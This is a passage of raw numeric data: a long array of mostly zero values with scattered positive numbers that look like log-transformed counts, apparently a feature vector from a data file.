0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.143134726391533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 4.219507705176107, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 4.219507705176107, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 3.4011973816621555, \n 0, 3.3322045101752034, 0, 2.8903717578961645, 0, 0, 0.0, 0, 0.0, \n 3.2188758248682006, 0, 1.791759469228055, 0, 0.0, 4.394449154672439, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.58351893845611,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.655991810819852, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 5.03709614637473, 0.0, 0, 2.772588722239781, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.4657359027997265, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 1.9459101490553132, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 10.484135188312965, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 5.030437921392435, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 3.649511027115099, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, \n 3.0841946160253872, 0, 0.0, 2.0794415416798357, 0.0, 0.0, \n 4.518263445217986, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 2.8903717578961645, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 